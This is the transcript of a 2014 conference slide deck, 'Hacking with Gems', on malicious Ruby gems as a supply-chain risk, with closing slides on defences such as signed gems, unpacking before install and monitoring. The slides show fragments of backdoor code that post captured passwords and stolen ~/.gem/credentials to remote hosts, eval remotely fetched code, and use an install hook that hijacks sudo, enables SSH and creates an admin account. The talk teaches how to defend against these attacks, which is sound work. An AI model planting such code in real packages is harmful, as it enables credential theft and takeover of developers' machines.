Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Hacking with Gems (denver.rb)
Search
Sponsored
·
Ship Features Fearlessly
Turn features on and off without deploys. Used by thousands of Ruby developers.
→
Benjamin Smith
August 13, 2014
Technology
190
0
Share
Hacking with Gems (denver.rb)
Benjamin Smith
August 13, 2014
More Decks by Benjamin Smith
See All by Benjamin Smith
Modules instead of Microservies
benjaminleesmith
0
120
Refactoring Rails Apps with Engines
benjaminleesmith
4
880
How I architected my big Rails app for success! (ConFoo 2014)
benjaminleesmith
1
260
Hacking with Gems (ConFoo 2014)
benjaminleesmith
1
140
How I architected my big Rails app for success! (RubyConfAU 2014)
benjaminleesmith
2
420
How I architected my big Rails app for success! (RMR 2013)
benjaminleesmith
4
410
Keeping Your Massive Rails App From Turning Into a S#!t Show (WindyCityRails 2013)
benjaminleesmith
1
270
Architecting your Rails app for success! (EuRuKo 2013)
benjaminleesmith
4
1.3k
Hacking with Gems (RuLu 2013)
benjaminleesmith
3
1.5k
Other Decks in Technology
See All in Technology
建設的な現実逃避のしかた / How to practice constructive escapism
pauli
4
290
Oracle AI Database@Google Cloud:サービス概要のご紹介
oracle4engineer
PRO
6
1.3k
暗黙知について一歩踏み込んで考える - 暗黙知の4タイプと暗黙考・暗黙動へ
masayamoriofficial
0
220
Databricksを用いたセキュアなデータ基盤構築とAIプロダクトへの応用.pdf
pkshadeck
PRO
0
200
ADOTで始めるサーバレスアーキテクチャのオブザーバビリティ
alchemy1115
2
260
Babylon.js を使って試した色々な内容 / Various things I tried using Babylon.js / Babylon.js 勉強会 vol.5
you
PRO
0
260
自己組織化を試される緑茶ハイを求めて、今日も全力であそんで学ぼう / Self-Organization and Shochu Green Tea
naitosatoshi
0
280
会社紹介資料 / Sansan Company Profile
sansan33
PRO
16
410k
AgentCore RuntimeからS3 Filesをマウントしてみる
har1101
3
360
AIにより大幅に強化された AWS Transform Customを触ってみる
0air
0
330
AWSで2番目にリリースされたサービスについてお話しします(諸説あります)
yama3133
0
130
Data Intelligence Engineering Unit 部門と各ポジション紹介
sansantech
PRO
0
130
Featured
See All Featured
Winning Ecommerce Organic Search in an AI Era - #searchnstuff2025
aleyda
1
2k
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
234
17k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
46
2.7k
Digital Ethics as a Driver of Design Innovation
axbom
PRO
1
250
Navigating Algorithm Shifts & AI Overviews - #SMXNext
aleyda
1
1.2k
The MySQL Ecosystem @ GitHub 2015
samlambert
251
13k
BBQ
matthewcrist
89
10k
First, design no harm
axbom
PRO
2
1.2k
How to make the Groovebox
asonas
2
2.1k
Done Done
chrislema
186
16k
Design of three-dimensional binary manipulators for pick-and-place task avoiding obstacles (IECON2024)
konakalab
0
390
KATA
mclloyd
PRO
35
15k
Transcript
Hacking with Gems Benjamin Smith @benjamin_smith
How to punk your friends with gems Benjamin Smith @benjamin_smith
How-to get rich quick and (maybe) not go to jail!
Benjamin Smith @benjamin_smith
Four reasons you should NOT trust Benjamin Smith @benjamin_smith
None
who i am
who i am
who i am
what i am NOT
None
please do not try this at home
please do not try this at home
None
None
Lawful Evil Lawful Good
Lawful Evil Lawful Good
Lawful Evil Lawful Good
Lawful Evil Lawful Good
once upon a time
GEM remote: https://rubygems.org/ specs: actionmailer (4.1.4) actionpack (= 4.1.4) actionview
(= 4.1.4) mail (~> 2.5.4) actionpack (4.1.4) actionview (= 4.1.4) activesupport (= 4.1.4) rack (~> 1.5.2)
what’s the worst that could happen?
None
gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages
before... github.com/benjaminleesmith/awesome-rails-flash-messages
after! github.com/benjaminleesmith/awesome-rails-flash-messages
some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages
... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages
?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages
i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages
i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages
“development.log” ... "user"=>{"email"=>"
[email protected]
", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages
elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages
profit • Step 1: do something • Step 2: do
something else • Step 3: ???? • Step 4: profit
profit • Step 1: write a gem that does something
• Step 2: • Step 3: • Step 4:
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: • Step 4:
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country
a one way ticket to
that was easy. what else can I do?
gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector
show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V
+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector
how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)
self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector
how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)
self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector
how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)
self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector
...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
/users/sign_in github.com/benjaminleesmith/net_http_detector
/users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector
hello db access! github.com/benjaminleesmith/net_http_detector
SELECT * FROM users; github.com/benjaminleesmith/net_http_detector
UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector
CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector
careful of wolves in sheep’s clothing
profit • Step 1: • Step 2: • Step 3:
• Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: • Step 3: • Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country
i like the beach
that was easy. what else can I do?
gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s
what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1
Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s
None
what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s
better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0
8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s
behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar
-zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s
what what github.com/benjaminleesmith/better_date_to_s
i can haz source github.com/benjaminleesmith/better_date_to_s
truth time • this gem doesn't actually work • but
it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s
so much code so little time • Step 1: write
a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country
that was easy hard. what else can I do? (that's
easier)
gem install bunlder
gem install be_truthy github.com/benjaminleesmith/be_truthy
what it does > true.should be_true > User.new.should be_true >
User.new.should be_truthy github.com/benjaminleesmith/be_truthy
what it ACTUALLY does github.com/benjaminleesmith/be_truthy
github.com/benjaminleesmith/be_truthy
file tree looks ok github.com/benjaminleesmith/be_truthy
source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy
but what was this? github.com/benjaminleesmith/be_truthy
I see no C github.com/benjaminleesmith/be_truthy
run the what file? Gem::Specification.new do |gem| ... gem.extensions =
["Rakefile"] ... end github.com/benjaminleesmith/be_truthy
there is no Rakefile github.com/benjaminleesmith/be_truthy
the real file tree github.com/benjaminleesmith/be_truthy
the real file tree github.com/benjaminleesmith/be_truthy
what does the Rakefile do? github.com/benjaminleesmith/be_truthy
sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy
File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy
FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy
what does "sudo" do now? github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy
/usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .
-passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy
Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy
ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy
take away: don't install ben's gems
None
how could I get you to install my gems?
what gems are trustworthy?
how can I add my code to already trusted gems?
back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip
).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy
gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`
Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem
gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`
Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem
gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`
Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem
now I own your gems github.com/benjaminleesmith/be_truthy
> git clone your-gem-repo ...add a little code... > rake
build > gem push your-gem github.com/benjaminleesmith/be_truthy
do people trust your gems?
do people who install your gems have trustworthy gems?
None
there’s still one problem
bootstrapping
being popular sucks
conferences
social engineering
None
None
None
so what happens now?
ruby gems goes down
heroku deploys go down
i go to the beach
ruby gems goes down
heroku deploys go down
recovery
so what now?
gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages
Little Snitch obdev.at/products/littlesnitch/index.html
gem install be_truthy github.com/benjaminleesmith/be_truthy
fseventer fernlightning.com/doku.php?id=software:fseventer:start
don’t “gem install” from strangers
gem fetch vs gem install > gem fetch be_truthy >
gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy
None
None
curl -sSL https://get.rvm.io | bash
gem install rails -P HighSecurity
> gem install rails -P HighSecurity Fetching: i18n-0.6.11.gem (100%) ERROR:
While executing gem ... (Gem::Security::Exception) unsigned gems are not allowed by the High Security policy
gem cert --build
https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-1.html http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-2.html
sandboxing
github.com/rubygems/rubygems
tools to detect malicious code
private gem repos
do not try this at home
don't install gems you don't need to
pay attention to what your gems do
monitor your system
read the source
gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary
on install github.com/benjaminleesmith/coal-mine-canary
the results github.com/benjaminleesmith/coal-mine-canary
thank you!
questions? ideas? @benjamin_smith https://github.com/benjaminleesmith
questions? ideas? @benjamin_smith https://github.com/benjaminleesmith
questions? ideas? @benjamin_smith https://github.com/benjaminleesmith
benjaminleesmith
pauli
oracle4engineer
masayamoriofficial
pkshadeck
alchemy1115
you
naitosatoshi
sansan33
har1101
0air
yama3133
sansantech
aleyda
marcelosomers
bcantrill
axbom
samlambert
matthewcrist
asonas
chrislema
konakalab
mclloyd
![“development.log” ... "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages](https://files.speakerdeck.com/presentations/3948262004d1013270b06a6b763b0851/slide_30.jpg){kind=link}
![database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if](https://files.speakerdeck.com/presentations/3948262004d1013270b06a6b763b0851/slide_46.jpg){kind=link}
![database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if](https://files.speakerdeck.com/presentations/3948262004d1013270b06a6b763b0851/slide_47.jpg){kind=link}
![database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if](https://files.speakerdeck.com/presentations/3948262004d1013270b06a6b763b0851/slide_48.jpg){kind=link}
![database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if](https://files.speakerdeck.com/presentations/3948262004d1013270b06a6b763b0851/slide_49.jpg){kind=link}
